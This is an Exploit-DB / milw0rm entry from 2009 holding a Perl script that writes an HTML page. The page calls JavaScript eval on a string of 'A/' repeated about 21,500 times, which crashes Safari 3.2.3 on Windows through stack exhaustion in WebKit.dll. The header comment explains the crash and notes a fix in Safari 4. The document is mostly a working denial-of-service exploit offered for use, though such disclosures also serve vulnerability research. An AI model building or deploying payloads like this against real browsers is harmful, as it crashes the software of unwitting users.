Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service

EDB-ID:

9606

Type:

dos

Platform:

Windows_x86

Published:

2009-09-09

#!/usr/bin/perl
# letsgosurfinnowonsafari.pl
# AKA
# Safari 3.2.3 (Win32) JavaScript 'eval' Remote Denial of Service Exploit
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.07.2009
#
# *********************************************************************************************************
# Safari crashes when interpreting a webpage that calls the "eval" JavaScript function with "A/" repeating
# 21526 times (43052 bytes). When triggering this vulnerability, Safari will throw a "Stack Overflow"
# exception, and then an access violation when adjusting the trigger to "A/" repeating 21697 times
# (43394 bytes). The problem originates in the module "WebKit.dll". Safari uses this module as part of the
# WebKit layout engine (www.webkit.org).

# This issue was reported to Apple several months ago and it looks like they fixed it in Safari 4
# (4.1.2 tested) after recent testing. It has also been lying around the Fun Archive @ krakowlabs.com for
# quite a while too. Btw, STACK_OVERFLOW does NOT mean there is a buffer overflow on the stack. It pretty
# much means that the stack for the process has been exhausted and its maximum size has been reached.
# *********************************************************************************************************
# letsgosurfinnowonsafari.pl

$fn   = 'letsgosurfinnowwithsafari.html';
$size = 21526; # "Stack Overflow" WebKit.dll
#$size = 21697; # "Access Violation" WebKit.dll

$payload = '<html><script type="text/javascript">' . "\n";
$payload = $payload . 'eval("' . "A/" x $size . '");' . "\n";
$payload = $payload . '</script></html>';

     open(FD, '>' . $fn);
     print FD $payload;
     close(FD);

# milw0rm.com [2009-09-09]